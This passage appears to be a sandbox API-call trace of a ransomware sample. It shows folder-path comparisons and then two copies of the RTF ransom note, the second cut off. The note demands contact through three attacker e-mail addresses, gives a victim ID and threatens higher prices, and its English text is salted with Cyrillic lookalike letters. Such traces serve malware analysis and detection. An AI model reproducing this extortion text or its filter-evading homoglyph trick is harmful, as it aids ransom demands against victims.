CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\", cchCount2=80) returned 1 [0070.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\", cchCount2=80) returned 3 [0070.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\", cchCount2=80) returned 3 [0070.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\", cchCount2=80) returned 2 [0070.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\", cchCount1=80, lpString2="C:\\Program Files\\", cchCount2=17) returned 1 [0070.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Program Files\\", cchCount2=17) returned 1 [0070.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\", cchCount1=48, lpString2="C:\\Program Files\\", cchCount2=17) returned 3 [0070.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=78, lpString2="C:\\Program Files\\", cchCount2=17) returned 3 [0070.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount1=68, lpString2="C:\\Program Files\\", cchCount2=17) returned 3 [0070.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\", cchCount1=80, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 1 [0070.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 1 [0070.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount1=46, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 1 [0070.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5KV2W3L69- l7u9zN7\\", cchCount1=58, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 1 [0070.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=65, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 1 [0070.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount1=41, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\", cchCount2=41) returned 2 [0070.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\", cchCount1=80, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount1=46, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5KV2W3L69- l7u9zN7\\", cchCount1=58, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 1 [0070.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount1=65, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\", cchCount2=65) returned 2 [0070.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 1 [0070.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 3 [0070.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount1=80, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\", cchCount2=80) returned 2 [0070.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\", cchCount1=80, lpString2="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", cchCount2=68) returned 1 [0070.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0070.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 